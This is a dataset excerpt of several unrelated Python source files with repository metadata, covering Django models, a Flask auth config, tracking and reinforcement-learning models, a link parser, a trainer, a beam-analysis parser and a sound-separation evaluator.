hit_count_generic = GenericRelation(HitCount, object_id_field='object_pk',
related_query_name='hit_count_generic_relation')
def __str__(self):
return self.name
class Meta:
verbose_name = "가게"
verbose_name_plural = "가게"
ordering = ['-id']
from django.contrib.auth import get_user_model
User = get_user_model()
try:
user_pk = User.objects.get(username='deleteuser').id
except:
user_pk = None
class QuestionComment(models.Model):
store_profile = models.ForeignKey(StoreProfile, verbose_name="가게", on_delete=models.CASCADE)
if user_pk:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.SET_DEFAULT, default=user_pk)
else:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.CASCADE)
comment = models.TextField(verbose_name="문의글", max_length=1000)
created_at = models.DateTimeField(verbose_name="작성일", auto_now_add=True)
updated_at = models.DateTimeField(verbose_name="최근 업데이트", auto_now=True)
parent = models.ForeignKey('self', verbose_name="상위 댓글", null=True, blank=True, related_name='replies', on_delete=models.CASCADE)
def __str__(self):
return self.author.storeprofile.name
class Meta:
ordering = ('-created_at',)
verbose_name = "가게 문의"
verbose_name_plural = "가게 문의"
from trade.models import Item
class StoreGrade(models.Model):
store_profile = models.ForeignKey(StoreProfile, verbose_name="가게", on_delete=models.CASCADE)
if user_pk:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.SET_DEFAULT ,default=user_pk)
else:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.CASCADE)
store_item = models.ForeignKey(Item, verbose_name="구매한 물품", on_delete=models.SET_NULL, null=True)
grade_comment = models.TextField(verbose_name="물품평", max_length=250)
rating = models.PositiveIntegerField(
verbose_name="점수",
choices=(
(1, '★☆☆☆☆'),
(2, '★★☆☆☆'),
(3, '★★★☆☆'),
(4, '★★★★☆'),
(5, '★★★★★')
),
default=0,
db_index=True
)
created_at = models.DateTimeField(verbose_name="작성일", auto_now_add=True)
updated_at = models.DateTimeField(verbose_name="최근 업데이트", auto_now=True)
def __str__(self):
return self.author.storeprofile.name
class Meta:
ordering = ('-created_at',)
verbose_name = "가게 평점"
verbose_name_plural = "가게 평점"
| 36.5
| 133
| 0.692308
| 3,321
| 0.824888
| 0
| 0
| 0
| 0
| 0
| 0
| 592
| 0.147044
|
554fefef5722dcfd6c785e2d4dadd682981a85f8
| 1,361
|
py
|
Python
|
auth-api/app.py
|
dlavery/auth
|
9f37b4be2eeda2446b7d3abd44c7b45918486e0b
|
[
"MIT"
] | null | null | null |
auth-api/app.py
|
dlavery/auth
|
9f37b4be2eeda2446b7d3abd44c7b45918486e0b
|
[
"MIT"
] | null | null | null |
auth-api/app.py
|
dlavery/auth
|
9f37b4be2eeda2446b7d3abd44c7b45918486e0b
|
[
"MIT"
] | null | null | null |
import configparser
import logging
from flask import Flask
from flask_pymongo import PyMongo
from Crypto.PublicKey import RSA
# Value mapping
LOG_LEVELS = {'INFO': logging.INFO, 'DEBUG': logging.DEBUG, 'WARN': logging.WARNING, 'ERROR': logging.ERROR}
# Create application
app = Flask(__name__)
# Read external config
config = configparser.ConfigParser()
config.read('auth-api.cfg')
app.config['MONGO_DBNAME'] = config['DATABASE']['dbName']
app.config['MONGO_URI'] = config['DATABASE']['dbURI']
logfile = config['LOGGING']['logFile']
loglevel = LOG_LEVELS[config['LOGGING']['logLevel']]
app.config['SERVER_NAME'] = config['APPLICATION']['serverName']
app.config['DEBUG'] = config['APPLICATION']['debug']
# Set up logging
fh = logging.FileHandler(logfile, mode='a', encoding='utf8', delay=False)
fmt = logging.Formatter('%(asctime)s %(levelname)s %(filename)s %(lineno)d %(message)s')
fh.setFormatter(fmt)
app.logger.addHandler(fh)
app.logger.setLevel(loglevel)
# Set up database
mongo = PyMongo(app)
# Get crypto
pubkeyfile = config['PKI']['pubkeyFile']
authpublickey = RSA.import_key(open(pubkeyfile).read()).exportKey()
keyfile = config['PKI']['keyFile']
passphrase = config['PKI']['passPhrase']
authprivatekey = RSA.import_key(open(keyfile).read(), passphrase=passphrase).exportKey()
# Get session secret
app.secret_key = config['SESSIONS']['secretKey']
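# A sample auth-api.cfg matching the keys read above (all values are
# placeholders / assumptions, shown only for illustration):
#
#   [DATABASE]
#   dbName = auth
#   dbURI = mongodb://localhost:27017/auth
#
#   [LOGGING]
#   logFile = auth-api.log
#   logLevel = INFO
#
#   [APPLICATION]
#   serverName = localhost:5000
#   debug = False
#
#   [PKI]
#   pubkeyFile = public.pem
#   keyFile = private.pem
#   passPhrase = change-me
#
#   [SESSIONS]
#   secretKey = change-me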
| 32.404762
| 106
| 0.740632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 465
| 0.341661
|
5555b6c3e07de5a90e04d4e0ebe99f3c40e0594c
| 1,587
|
py
|
Python
|
experts/siamdw.py
|
songheony/AAA-journal
|
4306fac0afe567269b8d2f1cbef2a1c398fdde82
|
[
"MIT"
] | 9
|
2020-07-07T09:03:07.000Z
|
2021-04-22T03:38:49.000Z
|
experts/siamdw.py
|
songheony/AAA-journal
|
4306fac0afe567269b8d2f1cbef2a1c398fdde82
|
[
"MIT"
] | null | null | null |
experts/siamdw.py
|
songheony/AAA-journal
|
4306fac0afe567269b8d2f1cbef2a1c398fdde82
|
[
"MIT"
] | 1
|
2021-07-31T19:26:52.000Z
|
2021-07-31T19:26:52.000Z
|
import sys
import numpy as np
import cv2
from easydict import EasyDict as edict
from base_tracker import BaseTracker
import path_config
sys.path.append("external/SiamDW/lib")
from tracker.siamrpn import SiamRPN
import models.models as models
from utils.utils import load_pretrain
class SiamDW(BaseTracker):
def __init__(self):
super().__init__("SiamDW")
net_file = path_config.SIAMDW_MODEL
info = edict()
info.arch = "SiamRPNRes22"
info.dataset = "OTB2015"
info.epoch_test = False
info.cls_type = "thinner"
self.tracker = SiamRPN(info)
self.net = models.__dict__[info.arch](anchors_nums=5, cls_type=info.cls_type)
self.net = load_pretrain(self.net, net_file)
self.net.eval()
self.net = self.net.cuda()
def initialize(self, image_file, box):
image = cv2.imread(image_file)
if len(image.shape) == 2:
image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
center = np.array([box[0] + (box[2] - 1) / 2, box[1] + (box[3] - 1) / 2])
size = np.array([box[2], box[3]])
self.state = self.tracker.init(image, center, size, self.net)
def track(self, image_file):
image = cv2.imread(image_file)
if len(image.shape) == 2:
image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
self.state = self.tracker.track(self.state, image)
center = self.state["target_pos"]
size = self.state["target_sz"]
bbox = (center[0] - size[0] / 2, center[1] - size[1] / 2, size[0], size[1])
return bbox
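# Rough usage sketch (kept as a comment, since constructing SiamDW needs the
# pretrained weights and a CUDA device): the tracker is seeded with a bounding
# box on the first frame and then queried frame by frame. The frame paths and
# box values below are hypothetical placeholders.
#
#   tracker = SiamDW()
#   tracker.initialize("frames/0001.jpg", (x, y, w, h))
#   for frame_path in ["frames/0002.jpg", "frames/0003.jpg"]:
#       box = tracker.track(frame_path)  # (x, y, w, h) of the tracked target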
| 34.5
| 85
| 0.628859
| 1,303
| 0.821046
| 0
| 0
| 0
| 0
| 0
| 0
| 84
| 0.05293
|
555695e92a72c35957e937841df7b620e7484601
| 3,346
|
py
|
Python
|
serpent/machine_learning/reinforcement_learning/rainbow_dqn/dqn.py
|
DylanSpicker/SerpentAI
|
c48c4b072e0d1084a52eac569ad1c7fa02ac7348
|
[
"MIT"
] | null | null | null |
serpent/machine_learning/reinforcement_learning/rainbow_dqn/dqn.py
|
DylanSpicker/SerpentAI
|
c48c4b072e0d1084a52eac569ad1c7fa02ac7348
|
[
"MIT"
] | null | null | null |
serpent/machine_learning/reinforcement_learning/rainbow_dqn/dqn.py
|
DylanSpicker/SerpentAI
|
c48c4b072e0d1084a52eac569ad1c7fa02ac7348
|
[
"MIT"
] | null | null | null |
import math
import torch
class DQN(torch.nn.Module):
def __init__(self, action_space, history=4, hidden_size=512, noisy_std=0.1, quantile=True):
super().__init__()
self.atoms = 200 if quantile else 51
self.action_space = action_space
self.quantile = quantile
self.conv1 = torch.nn.Conv2d(history, 32, 8, stride=4, padding=1)
self.conv2 = torch.nn.Conv2d(32, 64, 4, stride=2)
self.conv3 = torch.nn.Conv2d(64, 64, 3)
self.fc_h_v = NoisyLinear(5184, hidden_size, std_init=noisy_std)
self.fc_h_a = NoisyLinear(5184, hidden_size, std_init=noisy_std)
self.fc_z_v = NoisyLinear(hidden_size, self.atoms, std_init=noisy_std)
self.fc_z_a = NoisyLinear(hidden_size, action_space * self.atoms, std_init=noisy_std)
def forward(self, x):
x = torch.nn.functional.relu(self.conv1(x))
x = torch.nn.functional.relu(self.conv2(x))
x = torch.nn.functional.relu(self.conv3(x))
x = x.view(-1, 5184)
v = self.fc_z_v(torch.nn.functional.relu(self.fc_h_v(x)))
a = self.fc_z_a(torch.nn.functional.relu(self.fc_h_a(x)))
v, a = v.view(-1, 1, self.atoms), a.view(-1, self.action_space, self.atoms)
q = v + a - a.mean(1, keepdim=True)
if not self.quantile:
q = torch.nn.functional.softmax(q, dim=2)
return q
def reset_noise(self):
for name, module in self.named_children():
if "fc" in name:
module.reset_noise()
class NoisyLinear(torch.nn.Module):
def __init__(self, in_features, out_features, std_init=0.4):
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.std_init = std_init
self.weight_mu = torch.nn.Parameter(torch.empty(out_features, in_features))
self.weight_sigma = torch.nn.Parameter(torch.empty(out_features, in_features))
self.register_buffer("weight_epsilon", torch.empty(out_features, in_features))
self.bias_mu = torch.nn.Parameter(torch.empty(out_features))
self.bias_sigma = torch.nn.Parameter(torch.empty(out_features))
self.register_buffer("bias_epsilon", torch.empty(out_features))
self.reset_parameters()
self.reset_noise()
def reset_parameters(self):
mu_range = 1 / math.sqrt(self.in_features)
self.weight_mu.data.uniform_(-mu_range, mu_range)
self.weight_sigma.data.fill_(self.std_init / math.sqrt(self.in_features))
self.bias_mu.data.uniform_(-mu_range, mu_range)
self.bias_sigma.data.fill_(self.std_init / math.sqrt(self.out_features))
def reset_noise(self):
epsilon_in = self._scale_noise(self.in_features)
epsilon_out = self._scale_noise(self.out_features)
self.weight_epsilon.copy_(epsilon_out.ger(epsilon_in))
self.bias_epsilon.copy_(epsilon_out)
def forward(self, input):
if self.training:
return torch.nn.functional.linear(input, self.weight_mu + self.weight_sigma * self.weight_epsilon, self.bias_mu + self.bias_sigma * self.bias_epsilon)
else:
return torch.nn.functional.linear(input, self.weight_mu, self.bias_mu)
def _scale_noise(self, size):
x = torch.randn(size)
return x.sign().mul_(x.abs().sqrt_())
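# Minimal smoke test of the network above. The 100x100 input size is an
# assumption inferred from the hard-coded 5184-unit flatten (64 channels x 9 x 9
# after the three convolutions); the action count is arbitrary.
if __name__ == "__main__":
    net = DQN(action_space=6, history=4)
    frames = torch.zeros(1, 4, 100, 100)  # one stacked observation of 4 frames
    q = net(frames)                       # -> (batch, actions, atoms)
    print(q.shape)                        # torch.Size([1, 6, 200]) with quantile=True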
| 35.978495
| 162
| 0.661686
| 3,315
| 0.990735
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.010161
|
55572056018bf803954acf22ae96913928e3246d
| 1,479
|
py
|
Python
|
src/modules/base/url_helper.py
|
yakii9/artificial-programmer
|
a6c1a5a47155ee4d24be729a0fa8c86ca40f85d1
|
[
"MIT"
] | 1
|
2018-10-21T22:46:27.000Z
|
2018-10-21T22:46:27.000Z
|
src/modules/base/url_helper.py
|
yakii9/artificial-programmer
|
a6c1a5a47155ee4d24be729a0fa8c86ca40f85d1
|
[
"MIT"
] | 1
|
2018-10-29T04:34:13.000Z
|
2018-11-01T14:32:23.000Z
|
src/modules/base/url_helper.py
|
yakii9/artificial-programmer
|
a6c1a5a47155ee4d24be729a0fa8c86ca40f85d1
|
[
"MIT"
] | 1
|
2018-10-21T22:46:48.000Z
|
2018-10-21T22:46:48.000Z
|
import urllib.request
from html.parser import HTMLParser
from urllib import parse
from modules.base.handle_timeout import timeout
class ElementsFinder(HTMLParser):
def __init__(self, base_url, page_url):
super().__init__()
self.base_url = base_url
self.page_url = page_url
self.links = set()
# When we call HTMLParser feed() this function is called when it encounters an opening tag <a>
def handle_starttag(self, tag, attrs):
if tag == 'a':
for (attribute, value) in attrs:
if attribute == 'href':
url = parse.urljoin(self.base_url, value)
self.links.add(url)
def page_links(self):
return self.links
def error(self, message):
pass
class UrlHelper:
def __init__(self):
pass
@staticmethod
@timeout(6)
def get_html(url):
try:
with urllib.request.urlopen(url) as response:
html = response.read()
return html
except Exception as e:
print(e)
def get_domain_name(self, url):
try:
results = self.get_sub_domain_name(url).split('.')
return results[-2] + '.' + results[-1]
except:
return ''
# Get sub domain name (name.example.com)
@staticmethod
def get_sub_domain_name(url):
try:
return parse.urlparse(url).netloc
except:
return ''
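# Small illustration of the parser above, run only when the module is executed
# directly: ElementsFinder resolves every href it encounters against the base URL.
if __name__ == '__main__':
    finder = ElementsFinder('https://example.com', 'https://example.com/start')
    finder.feed('<a href="/about">About</a> <a href="https://other.org/x">X</a>')
    print(finder.page_links())
    # -> {'https://example.com/about', 'https://other.org/x'}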
| 25.067797
| 98
| 0.577417
| 1,343
| 0.908046
| 0
| 0
| 382
| 0.258283
| 0
| 0
| 153
| 0.103448
|
5557b931f8213b68a545c1e272d7bfa56dc0f55f
| 7,460
|
py
|
Python
|
trainer/trainer.py
|
iprapas/dl-continuous-deployment
|
bcee578a8ae3aa74e4ede00d125cb456f6a3010e
|
[
"MIT"
] | null | null | null |
trainer/trainer.py
|
iprapas/dl-continuous-deployment
|
bcee578a8ae3aa74e4ede00d125cb456f6a3010e
|
[
"MIT"
] | null | null | null |
trainer/trainer.py
|
iprapas/dl-continuous-deployment
|
bcee578a8ae3aa74e4ede00d125cb456f6a3010e
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torchvision.utils import make_grid
from base import BaseTrainer
from utils import inf_loop, MetricTracker, confusion_matrix_image
import copy
import sys
import time
from model.metric import Accuracy, TopkAccuracy
def get_top_k(x, ratio):
"""it will sample the top 1-ratio of the samples."""
x_data = x.view(-1)
x_len = x_data.nelement()
top_k = max(1, int(x_len * (1 - ratio)))
# get indices and the corresponding values
if top_k == 1:
_, selected_indices = torch.max(x_data.abs(), dim=0, keepdim=True)
else:
_, selected_indices = torch.topk(
x_data.abs(), top_k, largest=True, sorted=False
)
return x_data[selected_indices], selected_indices
def get_mask(flatten_arr, indices):
mask = torch.zeros_like(flatten_arr)
mask[indices] = 1
mask = mask.bool()
return mask.float(), (~mask).float()
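# Example of the two helpers above (shown as a comment so importing the module
# stays side-effect free): with ratio=0.5, only the half of the entries with the
# largest magnitude is kept, and get_mask marks those positions with ones.
#
#   x = torch.tensor([[0.1, -0.5], [0.9, 0.2]])
#   values, idx = get_top_k(x, ratio=0.5)   # values contain 0.9 and -0.5 (order not guaranteed)
#   keep, drop = get_mask(x.view(-1), idx)  # keep = [0., 1., 1., 0.], drop = 1 - keep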
class Trainer(BaseTrainer):
"""
Trainer class
"""
def __init__(self, model, criterion, metric_ftns, optimizer, config, data_loader,
valid_data_loader=None, lr_scheduler=None, len_epoch=None):
super().__init__(model, criterion, metric_ftns, optimizer, config)
self.config = config
self.data_loader = data_loader
if len_epoch is None:
# epoch-based training
self.len_epoch = len(self.data_loader)
else:
# iteration-based training
self.data_loader = inf_loop(data_loader)
self.len_epoch = len_epoch
self.valid_data_loader = valid_data_loader
self.do_validation = self.valid_data_loader is not None
self.lr_scheduler = lr_scheduler
self.log_step = int(np.sqrt(data_loader.batch_size))
self.deployed_model = copy.deepcopy(self.model)
self.init_model = copy.deepcopy(self.model)
self.init_model.eval()
self.deployed_model.eval()
self.accuracy = Accuracy()
self.topkaccuracy = TopkAccuracy()
self.train_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
self.valid_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)
def _train_epoch(self, epoch):
"""
Training logic for an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains average loss and metric in this epoch.
"""
start = time.time()
self.model.train()
total_batch = 0
self.train_metrics.reset()
training_time = 0
for batch_idx, (data, target) in enumerate(self.data_loader):
data, target = data.to(self.device), target.to(self.device)
batch_start = time.time()
self.optimizer.zero_grad()
output = self.model(data)
loss = self.criterion(output, target)
loss.backward()
self.optimizer.step()
training_time += time.time() - batch_start
self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)
self.train_metrics.update('loss', loss.item())
for met in self.metric_ftns:
self.train_metrics.update(met.__name__, met(output, target))
total_batch += time.time() - batch_start
if batch_idx % self.log_step == 0:
self.logger.info('Train Epoch: {} {} Loss: {:.6f} Time per batch (ms) {}'.format(
epoch,
self._progress(batch_idx),
loss.item(), total_batch * 1000 / (batch_idx + 1)))
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# valid_log = self._valid_deployed(batch_idx)
# print logged informations to the screen
# for key, value in valid_log.items():
# self.logger.info('Valid deployed {:15s}: {}'.format(str(key), value))
if batch_idx == self.len_epoch:
break
log = self.train_metrics.result()
if self.do_validation:
val_log = self._valid_epoch(epoch)
log.update(**{'val_' + k: v for k, v in val_log.items()})
log['time (sec)'] = time.time() - start
log['training_time'] = training_time
if self.lr_scheduler is not None:
self.lr_scheduler.step()
return log
def _valid_epoch(self, epoch):
"""
Validate after training an epoch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.model.eval()
self.valid_metrics.reset()
        avg_loss = 0
correct = 0
total = 0
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
avg_loss += loss.item()/len(self.valid_data_loader)
pred = torch.argmax(output, dim=1)
correct += torch.sum(pred == target).item()
total += len(target)
self.writer.set_step(epoch, 'valid')
self.writer.add_scalar('loss', avg_loss)
self.writer.add_scalar('accuracy', correct/total)
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
# add histogram of model parameters to the tensorboard
# for name, p in self.model.named_parameters():
# self.writer.add_histogram(name, p, bins='auto')
return self.valid_metrics.result()
def _valid_deployed(self, batch):
"""
Validate after training a batch
:param epoch: Integer, current training epoch.
:return: A log that contains information about validation
"""
self.deployed_model.eval()
self.valid_metrics.reset()
with torch.no_grad():
for batch_idx, (data, target) in enumerate(self.valid_data_loader):
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
self.writer.set_step((batch - 1) * len(self.valid_data_loader) + batch_idx*len(target), 'valid')
self.valid_metrics.update('loss', loss.item())
for met in self.metric_ftns:
self.valid_metrics.update(met.__name__, met)
# self.writer.add_image('input', make_grid(data.cpu(), nrow=8, normalize=True))
# self.writer.add_figure('confusion_matrix', confusion_matrix_image(output, target))
return self.valid_metrics.result()
def _progress(self, batch_idx):
base = '[{}/{} ({:.0f}%)]'
if hasattr(self.data_loader, 'n_samples'):
current = batch_idx * self.data_loader.batch_size
total = self.data_loader.n_samples
else:
current = batch_idx
total = self.len_epoch
return base.format(current, total, 100.0 * current / total)
| 38.061224
| 112
| 0.604826
| 6,541
| 0.87681
| 0
| 0
| 0
| 0
| 0
| 0
| 1,727
| 0.231501
|
555ab459155bc7618fd3e853eed5270201c2705f
| 341
|
py
|
Python
|
eoa.py
|
LDNN97/evolutionary-optimization-algorithm
|
5819ab759ecc1fee94a03e407c97f2ab7bd0f862
|
[
"MIT"
] | 21
|
2019-03-12T14:48:36.000Z
|
2022-03-08T12:55:30.000Z
|
eoa.py
|
LDNN97/Evolutionary-Optimization-Algorithms
|
5819ab759ecc1fee94a03e407c97f2ab7bd0f862
|
[
"MIT"
] | null | null | null |
eoa.py
|
LDNN97/Evolutionary-Optimization-Algorithms
|
5819ab759ecc1fee94a03e407c97f2ab7bd0f862
|
[
"MIT"
] | 5
|
2021-02-17T08:33:39.000Z
|
2022-01-23T11:44:16.000Z
|
from prob.problems import *
from opti.de import DE
from opti.cmaes import CMAES
from opti.cmaes_origin import CMAESO
from opti.cmaes_maes import CMAESM
from opti.cmaes_large import CMAESL
# beta
from opti.cmaes_bipop import CMAESB
if __name__ == "__main__":
TaskProb = Sphere(50, -50, 50)
Task = DE(TaskProb, 1000)
Task.run()
| 21.3125
| 36
| 0.747801
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.046921
|
555da31cec0240cea59e597af6f6196956ec03f6
| 574
|
py
|
Python
|
tests/test_common.py
|
shikanon/BaiduMapAPI
|
36c41bd99e523fa231e7d654f0ba504349b2a7ad
|
[
"MIT"
] | 7
|
2019-03-07T04:38:44.000Z
|
2021-04-23T02:43:10.000Z
|
tests/test_common.py
|
shikanon/BaiduMapAPI
|
36c41bd99e523fa231e7d654f0ba504349b2a7ad
|
[
"MIT"
] | 2
|
2020-03-24T16:47:11.000Z
|
2020-12-03T08:52:31.000Z
|
tests/test_common.py
|
shikanon/BaiduMapAPI
|
36c41bd99e523fa231e7d654f0ba504349b2a7ad
|
[
"MIT"
] | 1
|
2019-10-22T07:21:58.000Z
|
2019-10-22T07:21:58.000Z
|
from BaiduMapAPI.common import convertCoord, expandUp
import pytest
def test_convertCoord():
coord = convertCoord("12.32323,56.23422")
assert coord == "12.32323,56.23422"
coord = convertCoord((12.32323,56.23422))
assert coord == "12.32323,56.23422"
def test_expandUp():
test_dict = {"a" : "A", "b":{"bB": [{"Ba": 2}, "Bb", "Bc"], "bc": {"bcd":{"bcd": 4}}}}
testValue = expandUp(test_dict, "test")
assert testValue == {'test_a': 'A', 'test_b_bB_0_Ba': 2, 'test_b_bB_1': 'Bb',
'test_b_bB_2': 'Bc', 'test_b_bc_bcd_bcd': 4}
| 41
| 90
| 0.606272
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.317073
|
555e8fe1a5ae17b4fbc51d4ad0090a37d1dc68ba
| 3,520
|
py
|
Python
|
pycba/utils.py
|
mayermelhem/pycba
|
8f6a0da12629bac2ad1c6c8e113357f96931ef17
|
[
"Apache-2.0"
] | 10
|
2022-02-07T01:16:02.000Z
|
2022-03-12T07:56:43.000Z
|
pycba/utils.py
|
mayermelhem/pycba
|
8f6a0da12629bac2ad1c6c8e113357f96931ef17
|
[
"Apache-2.0"
] | 5
|
2022-02-08T07:42:53.000Z
|
2022-03-31T21:33:42.000Z
|
pycba/utils.py
|
mayermelhem/pycba
|
8f6a0da12629bac2ad1c6c8e113357f96931ef17
|
[
"Apache-2.0"
] | 1
|
2022-02-12T04:33:38.000Z
|
2022-02-12T04:33:38.000Z
|
"""
PyCBA - Utility functions for interacting with PyCBA
"""
import re
import numpy as np
from typing import Tuple
def parse_beam_string(
beam_string: str,
) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
"""
This function parses a beam descriptor string and returns CBA input vectors.
The beam descriptor string uses a specific format: spans lengths in float are
separated by single characters describing the terminals of that beam element.
The terminal characters are:
- P - pinned (effectively the same as roller, but retained for visualisations)
- R - roller (can occur at any terminal)
- E - encastre (i.e. fully-fixed) - can only occur at beam extremity
- F - free (e.g. cantilever end) - can only occur at beam extremity
- H - hinge - can only occur internally in the beam
Examples of beam strings are:
- *P40R20R* - 2-span, 60 m long, with pinned-roller-roller supports
- *E20H30R10F* - 3-span, 60 m long, encastre-hinge-roller-free
**Complex beam configurations may not be describable using the beam string.**
The function returns a tuple containing the necessary beam inputs for
:class:`pycba.analysis.BeamAnalysis`: `(L, EI, R, eType)`
Parameters
----------
beam_string :
The string to be parsed.
Raises
------
ValueError
When the beam string does not meet basic structural requirements.
Returns
-------
(L, EI, R, eType) : tuple(np.ndarray, np.ndarray, np.ndarray, np.ndarray)
In which:
- `L` is a vector of span lengths.
- `EI` is A vector of member flexural rigidities (prismatic).
- `R` is a vector describing the support conditions at each member end.
- `eType` is a vector of the member types.
Example
-------
This example creates a four-span beam with fixed extreme supports and
an internal hinge. ::
beam_str = "E30R30H30R30E"
(L, EI, R, eType) = cba.parse_beam_string(beam_str)
ils = cba.InfluenceLines(L, EI, R, eType)
ils.create_ils(step=0.1)
ils.plot_il(0.0, "R")
"""
beam_string = beam_string.lower()
terminals = re.findall(r"[efhpr]", beam_string)
spans_str = [m.end() for m in re.finditer(r"[efhpr]", beam_string)]
if len(terminals) < 2:
raise ValueError("At least two terminals must be defined")
if terminals[0] == "h" or terminals[-1] == "h":
raise ValueError("Cannot have a hinge at an extremity")
if len(terminals) > 2:
if any(t == "f" or t == "e" for t in terminals[1:-1]):
raise ValueError("Do not define internal free or encastre terminals")
# Get and check the span lengths
L = [
float(beam_string[spans_str[i] : spans_str[i + 1] - 1])
for i in range(len(spans_str) - 1)
]
if len(terminals) - 1 != len(L):
raise ValueError("Inconsistent terminal count and span count")
EI = 30 * 1e10 * np.ones(len(L)) * 1e-6 # kNm2 - arbitrary value
R = []
eType = [1 for l in L]
for i, t in enumerate(terminals):
if t == "p" or t == "r": # pin or roller
R.append([-1, 0])
elif t == "e": # encastre
R.append([-1, -1])
elif t == "f": # free
R.append([0, 0])
elif t == "h": # hinge
R.append([0, 0])
eType[i - 1] = 2
R = [elem for sublist in R for elem in sublist]
return (L, EI, R, eType)
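# Quick self-check of the parser above, run only when the module is executed
# directly. For "P40R20R" (two spans with pinned-roller-roller supports) the
# expected outputs are L = [40.0, 20.0], R = [-1, 0, -1, 0, -1, 0],
# eType = [1, 1], and the uniform placeholder EI of 3.0e5 kNm2.
if __name__ == "__main__":
    L, EI, R, eType = parse_beam_string("P40R20R")
    print(L, R, eType, EI)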
| 34.174757
| 86
| 0.605682
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,326
| 0.660795
|
555f6946d9a27cac92dae44e27d4220ecfaf6269
| 10,363
|
py
|
Python
|
models/dcase2020_fuss_baseline/evaluate_lib.py
|
marciopuga/sound-separation
|
0b23ae22123b041b9538295f32a92151cb77bff9
|
[
"Apache-2.0"
] | 412
|
2020-03-03T05:55:53.000Z
|
2022-03-29T20:49:11.000Z
|
models/dcase2020_fuss_baseline/evaluate_lib.py
|
marciopuga/sound-separation
|
0b23ae22123b041b9538295f32a92151cb77bff9
|
[
"Apache-2.0"
] | 12
|
2020-04-09T17:47:01.000Z
|
2022-03-22T06:07:04.000Z
|
models/dcase2020_fuss_baseline/evaluate_lib.py
|
marciopuga/sound-separation
|
0b23ae22123b041b9538295f32a92151cb77bff9
|
[
"Apache-2.0"
] | 89
|
2020-03-06T08:26:44.000Z
|
2022-03-31T11:36:23.000Z
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluate separated audio from a DCASE 2020 task 4 separation model."""
import os
import numpy as np
import pandas as pd
import tensorflow.compat.v1 as tf
import inference
from train import data_io
from train import metrics
from train import permutation_invariant
def _weights_for_nonzero_refs(source_waveforms):
"""Return shape (source,) weights for signals that are nonzero."""
source_norms = tf.sqrt(tf.reduce_mean(tf.square(source_waveforms), axis=-1))
return tf.greater(source_norms, 1e-8)
def _weights_for_active_seps(power_sources, power_separated):
"""Return (source,) weights for active separated signals."""
min_power = tf.reduce_min(power_sources, axis=-1, keepdims=True)
return tf.greater(power_separated, 0.01 * min_power)
def compute_metrics(source_waveforms, separated_waveforms, mixture_waveform):
"""Permutation-invariant SI-SNR, powers, and under/equal/over-separation."""
# Align separated sources to reference sources.
perm_inv_loss = permutation_invariant.wrap(
lambda tar, est: -metrics.signal_to_noise_ratio_gain_invariant(est, tar))
_, separated_waveforms = perm_inv_loss(source_waveforms[tf.newaxis],
separated_waveforms[tf.newaxis])
separated_waveforms = separated_waveforms[0] # Remove batch axis.
# Compute separated and source powers.
power_separated = tf.reduce_mean(separated_waveforms ** 2, axis=-1)
power_sources = tf.reduce_mean(source_waveforms ** 2, axis=-1)
# Compute weights for active (separated, source) pairs where source is nonzero
# and separated power is above threshold of quietest source power - 20 dB.
weights_active_refs = _weights_for_nonzero_refs(source_waveforms)
weights_active_seps = _weights_for_active_seps(
tf.boolean_mask(power_sources, weights_active_refs), power_separated)
weights_active_pairs = tf.logical_and(weights_active_refs,
weights_active_seps)
# Compute SI-SNR.
sisnr_separated = metrics.signal_to_noise_ratio_gain_invariant(
separated_waveforms, source_waveforms)
num_active_refs = tf.reduce_sum(tf.cast(weights_active_refs, tf.int32))
num_active_seps = tf.reduce_sum(tf.cast(weights_active_seps, tf.int32))
num_active_pairs = tf.reduce_sum(tf.cast(weights_active_pairs, tf.int32))
sisnr_mixture = metrics.signal_to_noise_ratio_gain_invariant(
tf.tile(mixture_waveform[tf.newaxis], (source_waveforms.shape[0], 1)),
source_waveforms)
# Compute under/equal/over separation.
under_separation = tf.cast(tf.less(num_active_seps, num_active_refs),
tf.float32)
equal_separation = tf.cast(tf.equal(num_active_seps, num_active_refs),
tf.float32)
over_separation = tf.cast(tf.greater(num_active_seps, num_active_refs),
tf.float32)
return {'sisnr_separated': sisnr_separated,
'sisnr_mixture': sisnr_mixture,
'sisnr_improvement': sisnr_separated - sisnr_mixture,
'power_separated': power_separated,
'power_sources': power_sources,
'under_separation': under_separation,
'equal_separation': equal_separation,
'over_separation': over_separation,
'weights_active_refs': weights_active_refs,
'weights_active_seps': weights_active_seps,
